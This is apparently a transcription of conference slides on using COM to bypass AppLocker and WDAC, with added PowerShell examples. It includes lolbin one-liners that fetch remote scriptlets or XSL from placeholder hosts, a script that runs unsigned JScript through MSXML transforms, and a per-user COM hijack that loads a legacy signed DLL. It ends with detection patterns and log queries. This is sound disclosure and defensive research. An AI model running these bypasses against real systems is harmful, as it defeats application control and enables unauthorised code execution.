
COM UNDER THE RADAR: CIRCUMVENTING APPLICATION CONTROL SOLUTIONS

Figure: Game Icons [1] > ◦ Jimmy Bayne | @bohops ◦ Security Assessor & Researcher @ByLightLLC ◦ From Baltimore, MD area ◦ Towson University Alum ◦ First BSides Talk ◦ Community Projects ◦ Blog | bohops.com ◦ LOLBAS | lolbas-project.github.io

Figure: Global Dispatch [2] > Agenda ◦ COM Overview ◦ Application Control Overview ◦ Application Control Bypasses ◦ Defensive Considerations

…ready…set…go! > COM Overview What is COM? ◦ COM = Component Object Model ◦ A binary interface standard for software interoperability ◦ Facilitates function calls between components (middleware) [1] ◦ Technologies built on it – DCOM, OLE, Automation, ActiveX Controls, etc. Terminology ◦ Interface: A definition for exposing COM functionality, including methods and properties ◦ Class: An ‘implementation’ of a group of COM interfaces that serves as a template for a COM object [2] ◦ Object (Component): An instance of a COM class ◦ Instantiation: The creation or activation of an object (instance)

[1] https://www.cs.umd.edu/~pugh/com/ [2] https://docs.microsoft.com/en-us/windows/desktop/com/com-class-objects-and-clsids > COM Overview Registered COM ◦ Registry keys direct the activation of COM objects ◦ COM class data is located in the HKCR Registry hive ◦ HKCR is a merged view of the \Software\Classes keys of the HKLM and HKCU hives ◦ Key values in HKCU take precedence over values in HKLM (for non-elevated processes; high-integrity processes ignore per-user class registrations, so a user-writable HKCU entry only redirects callers at medium integrity)

◦ Notable key structure in HKCR\CLSID\ ◦ CLSID – Class Identifier ({GUID}) ◦ InprocServer32 – In-process COM server implementation (DLL, OCX), loaded into the calling process ◦ LocalServer32 – Out-of-process COM server implementation (EXE) ◦ ProgID/VersionIndependentProgID – COM class friendly names, which resolve to the CLSID

*Note: There are other interesting keys as well > COM Overview Registered COM

Figure (screenshot, annotated labels): COM Class ID {CLSID}; COM Server (InprocServer32) – in-process server binary path; COM Object Programmatic Identifiers (ProgID) – friendly names

> COM Overview COM Example: COM Object Instantiation

Figure (screenshot, annotated labels): “Version Independent” ProgID friendly name; Interface ID (IID) [IWshShell3 interface]; IWshShell3 interface methods & properties
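The registry walk and the instantiation shown on the Registered COM and COM Example slides, as an added PowerShell example (not code from the talk). It assumes a stock Windows install where WScript.Shell is registered under HKLM; the function names Resolve-ComServer and Invoke-WshExec are mine. HKCU is consulted before HKLM because that is the order the merged HKCR view uses for a non-elevated caller, so the SourceHive field doubles as a per-user hijack indicator.

```powershell
# Added example: resolve a ProgID the way COM does, then instantiate it and call IWshShell3.Exec.
# Assumes a default Windows install (WScript.Shell registered under HKLM). Function names are mine.

function Resolve-ComServer {
    # ProgID -> CLSID -> InprocServer32/LocalServer32, consulting HKCU before HKLM because the
    # merged HKCR view prefers per-user class registrations for non-elevated callers.
    param([Parameter(Mandatory)][string]$ProgId)

    $hives = @('HKEY_CURRENT_USER', 'HKEY_LOCAL_MACHINE')

    # Step 1: the ProgID key's CLSID subkey holds the {GUID} in its default value
    $clsid = $null
    foreach ($hive in $hives) {
        $key = "Registry::$hive\Software\Classes\$ProgId\CLSID"
        if (Test-Path -LiteralPath $key) {
            $clsid = (Get-ItemProperty -LiteralPath $key).'(default)'
            break
        }
    }
    if (-not $clsid) { throw "ProgID '$ProgId' is not registered in HKCU or HKLM" }

    # Step 2: the CLSID key names the server binary; record which hive answered
    foreach ($hive in $hives) {
        foreach ($kind in 'InprocServer32', 'LocalServer32') {
            $key = "Registry::$hive\Software\Classes\CLSID\$clsid\$kind"
            if (Test-Path -LiteralPath $key) {
                $raw = (Get-ItemProperty -LiteralPath $key).'(default)'
                return [pscustomobject]@{
                    ProgId     = $ProgId
                    Clsid      = $clsid
                    ServerType = $kind
                    ServerPath = [Environment]::ExpandEnvironmentVariables($raw)
                    SourceHive = $hive   # HKEY_CURRENT_USER here means a per-user override is in play
                }
            }
        }
    }
    throw "CLSID $clsid has no InprocServer32 or LocalServer32 registration"
}

function Invoke-WshExec {
    # Instantiates WScript.Shell through its version-independent ProgID and calls
    # IWshShell3::Exec, which returns a WshScriptExec object exposing the child's StdOut.
    param([string]$Command = 'cmd.exe /c echo hello from COM')

    $shell = New-Object -ComObject 'WScript.Shell'
    $exec  = $shell.Exec($Command)
    while ($exec.Status -eq 0) { Start-Sleep -Milliseconds 50 }   # 0 = WshRunning, 1 = WshFinished
    return $exec.StdOut.ReadAll().Trim()
}

# Show the resolution chain, then the interface surface, then an actual method call
Resolve-ComServer -ProgId 'WScript.Shell' | Format-List

$shell = New-Object -ComObject 'WScript.Shell'
$shell | Get-Member -MemberType Method | Select-Object Name, Definition   # the IWshShell3 methods

Invoke-WshExec
```

Resolve-ComServer is also useful on its own: run it against any ProgID you see in module logging, and a SourceHive of HKEY_CURRENT_USER with a ServerPath outside %SystemRoot% is the registry footprint of the per-user COM hijack discussed later in the deck.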

Figure (screenshot, annotated label): Exec method call > COM Overview COM Abuse Vectors ◦ Script Engines (Languages) – JScript, VBScript ◦ Script Hosts – (signed) binaries that execute script code ◦ ‘Facilitators’ – (signed) binaries that ‘enable’ script host code execution (e.g. lolbins) ◦ PowerShell ◦ COM functionality that gets abused: • Registration • Resolution • Features/Capabilities > COM Resources

James Forshaw (@tiraniddo) Matt Nelson (@enigma0x3) Rob Maslen (@rbmaslen) Casey Smith (@subTee) https://www.youtube.com/watch?v=dfMuzAZRGm4 https://www.youtube.com/watch?v=3gz1QmiMhss https://www.youtube.com/watch?v=xmbjRP5W-yk

Source: Natty Boh Gear [5] > Application Control Overview Application Control is the practice of restricting unauthorized code execution Approaches ◦ Whitelists ◦ Blocklists ◦ Hybrid Application Control ≈ Application Whitelisting (AWL) Two major solutions ◦ AppLocker ◦ WDAC (Device Guard)

Figure: Wikipedia [4] > AppLocker ◦ Available since Windows 7 / Windows Server 2008 R2 (Enterprise & Ultimate editions) ◦ Configured through Group Policy (Local Security Policy or GPO) ◦ Supported Modes: Enforcement & Audit ◦ Rule Collections: Executable, Installer, Scripts, Packaged apps, DLLs ◦ Rule Conditions: File Hash, Path & Publisher ◦ Default Rules - Enforced Configuration ◦ Built-in option for generating a baseline rule set ◦ Places PowerShell in Constrained Language Mode (CLM) ◦ [-] Not code integrity aware ◦ [-] Not considered a security boundary ◦ [+] Less overhead to implement

> WDAC ◦ Available since Windows 10 Enterprise / Windows Server 2016 ◦ Configured through PowerShell cmdlets ◦ Supported Modes: Enforcement & Audit ◦ Rule Conditions: File Hash, File Name, Publisher, Signing Cert, etc. ◦ Default Rules - Enforced Configuration ◦ XML Policy - %systemroot%\schemas\CodeIntegrity\ExamplePolicies\DefaultWindows_Enforced. ◦ Places PowerShell in Constrained Language Mode (CLM) ◦ [+] Code integrity aware (UMCI) ◦ [+] Considered a security boundary ◦ [-] Administrative overhead (maybe…)

> PowerShell ◦ PowerShell - “a task-based command-line shell and scripting language built on .NET” (Microsoft Docs) ◦ COM object support (e.g. the New-Object -ComObject cmdlet) ◦ Great for Dev/IT management ◦ (Not so) great for hackers and Red Teams ◦ PowerShell version 5(.1) enhancements ◦ Detection optics (when enabled) ◦ Script block logging, module logging, and transcription ◦ Constrained Language Mode (CLM) support

◦ Restricts sensitive language elements (arbitrary .NET types, Add-Type, most method invocation) Source: Wiki Media [6] ◦ Not a security boundary ◦ “Implementation” determines effectiveness > COM: Circumventing AppLocker ◦ Default Rules ◦ Gaps in the default Path rules (user-writable directories under %WINDIR% are still allowed) permit the execution of any script or executable dropped there ◦ Unprivileged users can “write to” interesting paths

Source: https://gist.github.com/api0cradle/563226464376d40e191ce53abcf9c4d0 > COM: Circumventing AppLocker ◦ 50 Shades of Squiblydoo

◦ Most variants abuse COM/DLL registration ◦ Leverages scriptlet component files (.sct) and the scriptlet runtime component (scrobj.dll) ◦ Component files can create objects and run unsigned script code

Figure: Scriptlet Component File (“.sct”) (Source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1117/.sct)

> COM: Circumventing AppLocker 50 Shades of Squiblydoo (Examples) ◦ regsvr32.exe /s /n /u /i:http://url/file.sct scrobj.dll ◦ cscript.exe pubprn.vbs 127.0.0.1 script:http://someurl/file.sct ◦ cmstp.exe /s file.inf ◦ rundll32.exe advpack.dll,LaunchINFSection file.inf,DefaultInstall,1, ◦ rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 c:\ to file.inf

Credits Casey Smith (@subTee) Matt Nelson (@enigma0x3) Nick Tyrer (@NickTyrer) Kyle Hanslovan (@KyleHanslovan) > COM: Circumventing AppLocker XML Stylesheet Transformation (XSLT) ◦ Intended for transforming XML docs into other outputs ◦ Under the hood, the bypass variant abuses MSXML COM objects (interface methods and properties) ◦ XSL transform functions can execute script code embedded in the stylesheet (msxsl:script blocks) > COM: Circumventing AppLocker XML Stylesheet Transformation (XSLT)

wmic process get /format:"https://example.com/evil.xsl"

http://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking. (Credit: Casey Smith - @subTee) > COM: Circumventing AppLocker PowerShell CLM ◦ CLM restricts unapproved script execution, cmdlets, arbitrary .NET types, type definitions, etc. ◦ However, the New-Object cmdlet can still instantiate COM objects under AppLocker “enforcement”, since AppLocker applies no code integrity check to COM activation ◦ Example: PowerShell XML Stylesheet Transform > AppLocker Resources

Adam Chester (@_xpn_) Oddvar Moe (@Oddvarmoe) https://blog.xpnsec.com/constrained-language-mode-bypass/ https://www.youtube.com/watch?v=zw21CbNeAjA > COM: Circumventing WDAC Windows Lockdown Policy (WLDP) • is activated when WDAC enforces a code integrity policy (UMCI = Enabled) • is consulted by “enlightened” script hosts and engines through wldp.dll • wldp.dll exports WldpIsClassInApprovedList(), which the host calls to validate whether a CLSID is on the approved list • the host only proceeds with instantiation of the COM (class) object if it is deemed safe Potential COM WDAC Bypass Conditions • Discovering script hosts that are not WLDP enlightened • Manipulating trusted hosts/scripts/cmdlets to execute arbitrary/unsigned code • Discovering script host/engine WLDP implementation flaws that evade WldpIsClassInApprovedList() (e.g. false reliance/oversight) • Discovering ‘unsafe’ COM objects that are in the approved list • Re-introducing old code that is still trusted > COM: Circumventing WDAC CVE-2018-8492: XML Stylesheet Transformation (XSLT) Bypass

◦ Under the WLDP enforced by UMCI, COM object instantiation is locked down to only a few COM objects. When this was initially tested, only the following objects were accessible:

◦ The Microsoft.XMLDOM.1.0 (Microsoft.XMLDOM) object was the most interesting

Source: https://bohops.com/2019/01/10/com-xsl-transformation-bypassing-microsoft-application-control-solutions-cve-2018-8492/ > COM: Circumventing WDAC CVE-2018-8492: XML Stylesheet Transformation (XSLT) Bypass

◦ A review of the exposed methods revealed various transform* functions > COM: Circumventing WDAC CVE-2018-8492: XML Stylesheet Transformation (XSLT) Bypass

◦ With transformNode and a simple XSLT, we were able to bypass WDAC and execute unsigned script code > COM: Circumventing WDAC AWL Bypass: Catalog Hygiene

◦ After CVE-2018-8492 was patched, the Microsoft.XMLDOM COM object could no longer be used to execute script code embedded in an XSL transform under the WDAC policy ◦ Microsoft patched and released a new msxml3.dll (the COM server) > COM: Circumventing WDAC AWL Bypass: Catalog Hygiene

◦ While re-building a new WDAC test machine, a test case came to mind: WDAC Bypass Replay ◦ For testing, a few previous versions of msxml3.dll (and their dependency files) were copied to the new WDAC test machine ◦ Interestingly, an earlier, unpatched DLL from the same Microsoft build series was still digitally signed > COM: Circumventing WDAC AWL Bypass: Catalog Hygiene

◦ A deeper look into the signature properties confirmed that it was catalog signed and revealed the path of the catalog file

> COM: Circumventing WDAC AWL Bypass: Catalog Hygiene ◦ For testing, the COM class registry keys were exported from HKLM to a .reg file for COM key hijacking ◦ The file was modified to target HKCU and to point the InprocServer32 path at the ‘legacy’ binary

> COM: Circumventing WDAC AWL Bypass: Catalog Hygiene ◦ After importing the .reg file back into the registry, the COM class keys were “hijacked” and merged into HKCR (the HKCU entry now shadows the HKLM one for non-elevated callers)

> COM: Circumventing WDAC AWL Bypass: Catalog Signature Hygiene ◦ Sure enough, a replay of the XSL transform bypass was successful ◦ The same unsigned script code was executed to bypass the WDAC policy: the old msxml3.dll still carried a valid catalog signature, so UMCI allowed it to load, and its pre-patch code did not refuse the embedded script

> COM: Circumventing WDAC AWL Bypass: Catalog Hygiene
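The XSL-transform execution from the PowerShell CLM and CVE-2018-8492 slides, together with the per-user CLSID hijack used for the catalog hygiene replay, as one added PowerShell example (not the talk's code and not Microsoft's). Assumptions: the JScript payload is deliberately benign and only returns a string naming the script engine that ran it; $LegacyDllPath is a hypothetical location for an older, still catalog-signed msxml3.dll (plus its version-matched dependencies) that you must supply yourself; the function names are mine. On a current system with the Microsoft recommended block rules deployed the replay is expected to fail, which is the point of testing it.

```powershell
# Added example: MSXML transformNode with embedded JScript (the XSLT bypass mechanism) plus the
# per-user InprocServer32 override the catalog-hygiene replay relied on. Lab use only.
# Assumptions: benign payload; $LegacyDllPath is hypothetical and must be supplied by you.

function Invoke-XslScript {
    # Loads an XSL stylesheet carrying an msxsl:script block into Microsoft.XMLDOM (msxml3) and
    # calls transformNode; MSXML3 runs the script to evaluate user:run() during the transform.
    param([string]$ProgId = 'Microsoft.XMLDOM')

    $xsl = @'
<?xml version="1.0"?>
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:msxsl="urn:schemas-microsoft-com:xslt"
    xmlns:user="urn:added-example">
  <xsl:output method="text"/>
  <msxsl:script language="JScript" implements-prefix="user">
    function run() {
      // Benign marker: proves unsigned script ran and names the engine that ran it.
      // A real payload would do new ActiveXObject("WScript.Shell").Run(...) here.
      return "script executed by " + ScriptEngine() + " " + ScriptEngineMajorVersion();
    }
  </msxsl:script>
  <xsl:template match="/"><xsl:value-of select="user:run()"/></xsl:template>
</xsl:stylesheet>
'@

    $doc = New-Object -ComObject $ProgId        # document to transform; its content is irrelevant
    $doc.async = $false
    $null = $doc.loadXML('<root/>')

    $style = New-Object -ComObject $ProgId
    $style.async = $false
    if (-not $style.loadXML($xsl)) { throw "XSL did not parse: $($style.parseError.reason)" }

    return $doc.transformNode($style)           # the string produced by the embedded script
}

function Set-PerUserComServer {
    # Writes HKCU\Software\Classes\CLSID\{clsid}\InprocServer32 = $DllPath for the given ProgID.
    # For a non-elevated caller this shadows the HKLM registration, which is exactly what importing
    # the edited .reg file on the slides did. -Remove deletes the override again.
    param(
        [Parameter(Mandatory)][string]$ProgId,
        [string]$DllPath,
        [switch]$Remove
    )
    $clsid = (Get-ItemProperty -LiteralPath "Registry::HKEY_CLASSES_ROOT\$ProgId\CLSID").'(default)'
    $key   = "Registry::HKEY_CURRENT_USER\Software\Classes\CLSID\$clsid"

    if ($Remove) {
        if (Test-Path -LiteralPath $key) { Remove-Item -LiteralPath $key -Recurse -Force }
        return "${clsid}: per-user override removed"
    }
    if (-not (Test-Path -LiteralPath $DllPath)) { throw "DLL not found: $DllPath" }

    $null = New-Item -Path "$key\InprocServer32" -Force
    Set-ItemProperty -LiteralPath "$key\InprocServer32" -Name '(default)'      -Value $DllPath
    Set-ItemProperty -LiteralPath "$key\InprocServer32" -Name 'ThreadingModel' -Value 'Both'

    # The premise of the replay: the legacy binary still carries a valid (catalog) signature
    $sig = Get-AuthenticodeSignature -FilePath $DllPath
    return "$clsid -> $DllPath [$($sig.Status), $($sig.SignatureType)]"
}

# 1. Baseline against the installed msxml3.dll: runs without UMCI, refused once WLDP/UMCI is on
Invoke-XslScript

# 2. Replay (run by hand): point the CLSID at an older, still-signed msxml3.dll, then call
#    Invoke-XslScript from a NEW powershell.exe that dot-sources these functions. COM caches the
#    CLSID -> DLL mapping per process, so the override is invisible to the process that did step 1.
#       $LegacyDllPath = 'C:\lab\legacy\msxml3.dll'     # hypothetical path; supply your own copy
#       Set-PerUserComServer -ProgId 'Microsoft.XMLDOM' -DllPath $LegacyDllPath
#       ... fresh process: Invoke-XslScript ...
#       Set-PerUserComServer -ProgId 'Microsoft.XMLDOM' -Remove
```

Two things worth checking while you run this: Get-AuthenticodeSignature reports SignatureType Catalog for the legacy DLL, which is why UMCI accepts it even though it is no longer the version Windows ships, and a WDAC policy that includes the Microsoft recommended block rules should log a Code Integrity block for that DLL rather than let the transform run.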

◦ Timeline ◦ December 2018: MSRC was notified about this issue. A case # was assigned. ◦ March 2019: MSRC case worker stated that a patch and CVE would be issued. ◦ April 2019: MSRC decided not to patch. Block Rules for offending DLLs were added to the WDAC Block Rules Policy.

https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules

◦ Future Research Opportunities ◦ Other AWL Bypasses ◦ Trust Subversion ◦ Possibly other use cases and security implications

◦ Trust Subversion References ◦ https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf By Matt Graeber (@mattifestation) > WDAC Resources

Matt Graeber (@mattifestation)

http://www.exploit-monday.com/

James Forshaw (@tiraniddo) Philip Tsukerman (@PhilipTsukerman)

https://www.youtube.com/watch?v=TyMQMFBtU3w https://tyranidslair.blogspot.com/

> Defensive Considerations Application Control (in general…) ◦ A huge security lift that complements other security controls (EDR, A/V, continuous monitoring, etc.) ◦ Consider evaluating and implementing it if you don’t, and continually test and improve enforcement policies if you do PowerShell ◦ Upgrade to version 5+ (and disable v2, which has none of the v5 logging, CLM or AMSI support) ◦ Enable CLM and advanced logging features – script block logging, module logging, and transcription ◦ PowerShell Operational Log module events (ID 4103): identify COM object instantiation events (New-Object -ComObject is recorded as a ParameterBinding entry) Antivirus (with AMSI support) ◦ MSFT has integrated AMSI with PowerShell (v5), Windows Script Host, JScript, VBScript, Office macros, .NET (getting there) ◦ There are notable gaps, but organizations should strongly consider A/V vendors that integrate with AMSI EDR/SIEM ◦ Continue monitoring for AWL gaps to have visibility into those (un)known offenders (e.g. script hosts) ◦ Continually test and improve detection efficacy ◦ Keep an eye on the emergence of Event Tracing for Windows (ETW) tools and capabilities

> Defensive Considerations Application Control Logging/Monitoring • AppLocker • Location - Event Viewer -> Application and Services Logs -> Microsoft -> Windows -> AppLocker • Log Types - EXE and DLL, MSI and Script, Packaged app-Deployment, and Packaged app-Execution • Use Case - Monitor for blocked execution events (and for audit-mode “would have been blocked” events before you enforce) • WDAC • Location - Event Viewer -> Application and Services Logs -> Microsoft -> Windows -> CodeIntegrity -> Operational • Use Case - Monitor for blocked execution events Application Control Policy/Rule Improvement & Testing ◦ AppLocker ◦ AaronLocker [https://github.com/Microsoft/AaronLocker] • WDAC • Recommended Block Rules [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules] • Patch Management • Testing ◦ PowerAL [https://github.com/api0cradle/PowerAL] ◦ GreatSCT [https://github.com/GreatSCT/GreatSCT] • Red Teaming/Purple Teaming • MITRE ATT&CK testing frameworks

> Contact Info • Twitter: @bohops • BloodHound Slack: @bohops

> References - Figures 1. GameIcons.net (CC 3.0) - https://game-icons.net/1x1/lorc/radar-sweep.html 2. Global Dispatch - http://www.theglobaldispatch.com/dark-knight-rises-star-tom-hardy-talks-heath-ledger-and-his-bane-costume-90012/ 3. Koadic GitHub - https://github.com/zerosum0x0/koadic 4. Wikipedia - https://en.wikipedia.org/wiki/Traffic_light#/media/File:Modern_British_LED_Traffic_Light.jpg 5. Natty Boh Gear - https://cdn.shopify.com/s/files/1/2648/0362/collections/HomeGamers-Natty-Boh-Collection-Icon_1200x1200.png 6. Wikimedia - https://upload.wikimedia.org/wikipedia/commons/2/2f/PowerShell_5.0_icon.png

> Useful COM Resources ◦ https://en.wikipedia.org/wiki/Component_Object_Model ◦ https://devblogs.microsoft.com/oldnewthing/20151020-00/?p=91321 ◦ https://www.varonis.com/blog/dcom-distributed-component-object-model/ ◦ https://docs.microsoft.com/en-us/cpp/mfc/automation?view=vs-2019 ◦ https://en.wikipedia.org/wiki/ActiveX ◦ https://en.wikipedia.org/wiki/Active_Scripting ◦ https://docs.microsoft.com/en-us/windows/desktop/com/interfaces-and-interface-implementations ◦ https://docs.microsoft.com/en-us/windows/desktop/com/com-class-objects-and-clsids ◦ https://docs.microsoft.com/en-us/windows/desktop/learnwin32/creating-an-object-in-com ◦ https://www.cs.umd.edu/~pugh/com/ ◦ https://hackdefense.com/docs/automating-the-enumeration-of-possible-dcom-vulnerabilities-axel-boesenach%20v1.0.pdf ◦ https://stackoverflow.com/questions/2187425/how-do-i-use-a-com-dll-with-loadlibrary-in-c ◦ http://pubs.opengroup.org/onlinepubs/009899899/CHP01CHP.HTM
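A worked companion to the Defensive Considerations slides, added here and not code from the talk. It scripts three of the checks those slides call for: flagging the lolbin/COM command lines from the Squiblydoo and XSLT slides, pulling COM instantiations out of PowerShell module-logging events (ID 4103), and listing enforcement blocks from the AppLocker and Code Integrity logs. The sample command lines and the sample 4103 message are constructed test data so the two parsing functions run offline; the Get-WinEvent functions query the live logs and only return results where module logging or AppLocker/WDAC is actually enabled. Function names, pattern names and thresholds are mine.

```powershell
# Added example for the Defensive Considerations slides (not from the talk). Assumptions: sample
# command lines and the sample 4103 message below are constructed; live queries need the logs enabled.

# (1) Command-line patterns lifted from the "50 Shades of Squiblydoo" and XSLT slides.
$ComAbusePatterns = [ordered]@{
    'regsvr32 scriptlet (Squiblydoo)' = 'regsvr32(\.exe)?\s.*?/i:.*scrobj\.dll'
    'pubprn.vbs script: moniker'      = 'pubprn\.vbs\s.*?script:'
    'cmstp INF'                       = 'cmstp(\.exe)?\s.*?/s\s+\S+\.inf'
    'advpack LaunchINFSection'        = 'rundll32(\.exe)?\s.*?advpack\.dll,LaunchINFSection'
    'setupapi InstallHinfSection'     = 'rundll32(\.exe)?\s.*?setupapi\.dll,InstallHinfSection'
    'wmic XSL transform'              = 'wmic(\.exe)?\s.*?/format:"?(https?://|\\\\|[a-z]:\\)'  # URL/UNC/file, not /format:list
}

function Test-ComAbuseCommandLine {
    # Emits one record per matching technique; -match is case-insensitive in PowerShell.
    param([Parameter(Mandatory, ValueFromPipeline)][string]$CommandLine)
    process {
        foreach ($name in $ComAbusePatterns.Keys) {
            if ($CommandLine -match $ComAbusePatterns[$name]) {
                [pscustomobject]@{ Technique = $name; CommandLine = $CommandLine }
            }
        }
    }
}

$SampleCommandLines = @(   # constructed: three from the slides, one benign control
    'regsvr32.exe /s /n /u /i:http://url/file.sct scrobj.dll'
    'wmic process get /format:"https://example.com/evil.xsl"'
    'rundll32.exe advpack.dll,LaunchINFSection file.inf,DefaultInstall,1,'
    'notepad.exe C:\Users\user\notes.txt'
)
$SampleCommandLines | Test-ComAbuseCommandLine | Format-Table -AutoSize   # 3 hits, notepad silent

# (2) Module logging (4103) records each cmdlet call with its bound parameters, so
#     New-Object -ComObject appears as a ParameterBinding line naming the ProgID/CLSID.
function Get-ComInstantiationFromMessage {
    param([Parameter(Mandatory, ValueFromPipeline)][string]$Message)
    process {
        if ($Message -match 'ParameterBinding\(New-Object\): name="ComObject"; value="([^"]+)"') {
            $Matches[1]
        }
    }
}

$Sample4103 = @'
CommandInvocation(New-Object): "New-Object"
ParameterBinding(New-Object): name="ComObject"; value="Microsoft.XMLDOM"
'@
Get-ComInstantiationFromMessage -Message $Sample4103   # constructed sample -> Microsoft.XMLDOM

function Get-ComInstantiationEvents {
    # Live query; needs module logging enabled (Group Policy or the ModuleLogging registry key).
    param([int]$MaxEvents = 500)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4103 } `
                 -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $progId = Get-ComInstantiationFromMessage -Message $_.Message
            if ($progId) { [pscustomobject]@{ Time = $_.TimeCreated; User = $_.UserId; ProgId = $progId } }
        }
}

# (3) The "monitor for blocked execution events" use case from the logging slide.
function Get-AppControlBlockEvents {
    # AppLocker: 8004 = EXE/DLL blocked, 8007 = script/MSI blocked (8003/8006 are the audit twins).
    # WDAC: 3077 = code integrity enforcement blocked a file (3076 is the audit-mode twin).
    param([int]$MaxEvents = 200)
    $queries = @(
        @{ LogName = 'Microsoft-Windows-AppLocker/EXE and DLL';    Id = 8004 }
        @{ LogName = 'Microsoft-Windows-AppLocker/MSI and Script'; Id = 8007 }
        @{ LogName = 'Microsoft-Windows-CodeIntegrity/Operational'; Id = 3077 }
    )
    foreach ($q in $queries) {
        Get-WinEvent -FilterHashtable $q -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
            Select-Object TimeCreated, Id, LogName, @{ n = 'Summary'; e = { $_.Message.Split("`n")[0] } }
    }
}

Get-ComInstantiationEvents | Format-Table -AutoSize
Get-AppControlBlockEvents  | Format-Table -AutoSize
```

The command-line patterns are intentionally narrow: the wmic rule only fires on a URL, UNC or drive path after /format:, because /format:list and /format:csv are everyday administrative usage. Feed Test-ComAbuseCommandLine from Security 4688 (with command-line auditing on) or Sysmon event 1, and treat a ProgId of Microsoft.XMLDOM or WScript.Shell from Get-ComInstantiationEvents in a session that should be in CLM as something to look at.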